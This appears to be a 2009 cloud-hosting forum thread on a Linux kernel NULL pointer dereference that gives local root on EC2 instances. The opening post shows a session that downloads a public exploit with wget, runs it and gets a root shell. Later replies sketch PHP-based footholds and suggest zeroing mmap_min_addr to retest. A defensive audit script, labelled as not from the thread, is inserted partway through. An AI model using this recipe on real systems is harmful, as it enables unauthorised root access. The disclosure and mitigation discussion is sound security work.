Thread: Kernel vulnerability affects EC2: NULL Pointer Dereference
Replies: 60 | Pages: 5 | Last Post: Nov 6, 2009 1:52 PM by Eric Hammond
Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 6:15 AM PDT
Hi. Last week a vulnerability was found in the Linux kernel that basically grants you root access to a machine if you have a normal user account. I've tested this in one instance running kernel 2.6.18-xenU-ec2-v1.0.
Example:
myuser@host /tmp $ uname -r
2.6.18-xenU-ec2-v1.0
myuser@host /tmp $ wget http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz
(...)
myuser@host /tmp $ tar zxvf 36038-4.tgz
exploit.c
run.c
run.sh
myuser@host /tmp $ whoami
myuser
myuser@host /tmp $ sh run.sh
padlina z lublina!
sh-3.2# whoami
root
sh-3.2#
Of course the attacker would have to first login to the machine with SSH, so it's bad but could be worse.
As we cannot have our custom kernels, we have to wait till Amazon releases a new kernel that fixes this. Does anyone know when this will happen?
Thank you.
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 6:28 AM PDT
in response to: ObRelman
Did anyone find any quick fix for this??
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 6:40 PM PDT
in response to: ObRelman
I have confirmed that this vulnerability also exists in aki-a71cf9ce, the current 2.6.21.7-2.fc8xen (32-bit) kernel from Amazon.
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 9:59 PM PDT
in response to: Eric Hammond
Tested using: Canonical Ubuntu 8.10 Intrepid ami-5059be39
ubuntu@domU-12-31-39-00-DD-13:~$ uname -r
2.6.27-23-xen
ubuntu@domU-12-31-39-00-DD-13:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.10
Release: 8.10
Codename: intrepid
ubuntu@domU-12-31-39-00-DD-13:~$ sh run.sh
run.c: In function ‘main’:
run.c:13: warning: missing sentinel in function call
padlina z lublina!
mprotect: Cannot allocate memory
ubuntu@domU-12-31-39-00-DD-13:~$
This is fixed on the Canonical kernel. AWS folks, any comments or fix on this?
Rodney
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 10:31 PM PDT
in response to: ObRelman
The attacker doesn't need SSH access, he needs any type of access that would let him download and execute the script.
A pretty bad scenario would be:
You have an insecure script (could be an open-source application, where it's usually easier to find vulnerabilities).
For example, it could be a PHP application; there are tons of scripts out there that still require register_globals and, regardless, many applications have remote inclusion vulnerabilities.
That should be enough to grant PHP access, which means there's a high chance that the attacker could execute whatever he/she wants.
Sounds easy, doesn't it?
Well, it doesn't only sound easy, it -is- easy...
Edit:
It's sad (and a little funny) how run.sh even compiles everything for you...
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 10:46 PM PDT
in response to: samitny
@samitny
but at the minimum you require gcc to be installed for compiling run.c :)
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 11:39 PM PDT
in response to: ObRelman
In theory there is a workaround many people are using that consists of setting mmap_min_addr to a non-null value. For example:
echo 4096 > /proc/sys/vm/mmap_min_addr
However, this key is not available in the 2.6.18-xenU-ec2-v1.0 kernel.
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 11:44 PM PDT
in response to: ObRelman
@ObRelman
Or you can compile it on a different machine, upload, chmod and execute...
There's a solution for everything :-)
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:20 AM PDT
in response to: Rodney Quillo
> Tested using: Canonical Ubuntu 8.10 Intrepid ami-5059be39
> [...]
> ubuntu@domU-12-31-39-00-DD-13:~$ sh run.sh
> [...]
> mprotect: Cannot allocate memory
> This is fixed on Canonical kernel.
That Canonical kernel was built back in April, so it doesn't seem likely it would have deliberately fixed a security hole which was just publicized. Are you saying that you know this particular kernel is not vulnerable to the underlying flaw? Or just that this particular exploit program doesn't happen to work on it?
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:32 AM PDT
in response to: Eric Hammond
Ubuntu enabled the mmap_min_addr protection just in case an exploit appeared in the future. So the kernel is vulnerable.
Having a look at an Ubuntu 8.04 /etc/sysctl.conf:
# protect bottom 64k of memory from mmap to prevent NULL-dereference
# attacks against potential future kernel security vulnerabilities.
# (Added in kernel 2.6.23.)
vm.mmap_min_addr = 65536
@rodneyq
If you want to test it, try doing a "echo 0 > /proc/sys/vm/mmap_min_addr" and rerunning the exploit.
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 4:55 AM PDT
in response to: ObRelman
ObRelman:
Thanks for the clarification.
Unfortunately, the vm.mmap_min_addr workaround protection does not seem to be available on the 2.6.21 kernel.
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:50 PM PDT
in response to: Eric Hammond
Hi Eric,
I just tested it out of curiosity. And this program doesn't happen to work on this kernel. :)
Rodney
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:52 PM PDT
in response to: ObRelman
ObRelman:
> If you want to test it, try doing a "echo 0 > /proc/sys/vm/mmap_min_addr" and rerunning the exploit.
Trying it again using this.
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 3:45 PM PDT
in response to: Rodney Quillo
rodneyq:
After testing with the input from ObRelman, I verified that the Canonical kernel does have the vulnerability, but that particular exploit program does not work with that kernel if mmap_min_addr is set to above zero. All of the Ubuntu images seem to default to mmap_min_addr above zero, so they are safe from this particular exploit.
It still isn't clear to me if there might be other exploits for the kernel vulnerability, but in any case, I strongly support new kernels all around from Amazon and Canonical fixing this vulnerability.
We know historically that kernels need to have security patches; there needs to be a clear process and strong policy for this to happen on EC2.
This is a big security issue for folks who have multi-user systems running on EC2, but just think of the impact if the next published kernel vulnerability has an easy exploit over the network and nobody on EC2 can protect themselves.
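As an added example (not posted by anyone in this thread), the checks the posts above keep coming back to, written up as a POSIX shell audit a defender can run on an instance: it reports whether the vm.mmap_min_addr sysctl exists and is non-zero, and flags the two Amazon kernel release strings the thread reports as vulnerable. The optional path argument and the MMAP_CHECK_NO_MAIN variable are my own additions so the function can be exercised against a constructed file.

```shell
#!/bin/sh
# Added audit script (not from the thread). Checks the mmap_min_addr mitigation
# the posters discuss and flags the kernel releases the thread reports vulnerable.

# Report the state of vm.mmap_min_addr. Exit codes: 0 = key present and
# non-zero (low pages cannot be mapped by unprivileged users), 1 = key present
# but 0 (workaround not applied), 2 = key absent or unreadable (kernel predates
# the sysctl, as the thread reports for 2.6.18-xenU-ec2-v1.0 and 2.6.21).
# The path argument only exists so the function can be run on a constructed file.
check_mmap_min_addr() {
    path="${1:-/proc/sys/vm/mmap_min_addr}"
    if [ ! -r "$path" ]; then
        echo "absent"
        return 2
    fi
    value=$(cat "$path")
    case "$value" in
        ''|*[!0-9]*) echo "unreadable"; return 2 ;;
    esac
    if [ "$value" -eq 0 ]; then
        echo "zero"
        return 1
    fi
    echo "protected:$value"
    return 0
}

# Kernel release strings that posts in this thread confirmed as vulnerable.
is_known_vulnerable_kernel() {
    case "$1" in
        2.6.18-xenU-ec2-v1.0|2.6.21.7-2.fc8xen) return 0 ;;
        *) return 1 ;;
    esac
}

# Live run against the current host; set MMAP_CHECK_NO_MAIN=1 to skip it.
if [ -z "$MMAP_CHECK_NO_MAIN" ]; then
    release=$(uname -r)
    if is_known_vulnerable_kernel "$release"; then
        echo "kernel $release is reported vulnerable in this thread; only a patched kernel fixes it"
    fi
    check_mmap_min_addr ||
        echo "WARNING: no effective mmap_min_addr setting; unprivileged users may map page zero"
fi
```

A non-zero mmap_min_addr only blocks this particular exploit technique, as Eric Hammond notes above; it is a stopgap until a fixed kernel is available.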
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 22, 2009 4:42 AM PDT
in response to: ObRelman
Come on Amazon - what's your response here? I think Amazon needs to respond to this issue, either by releasing updated AMIs or by stating their policy on this problem.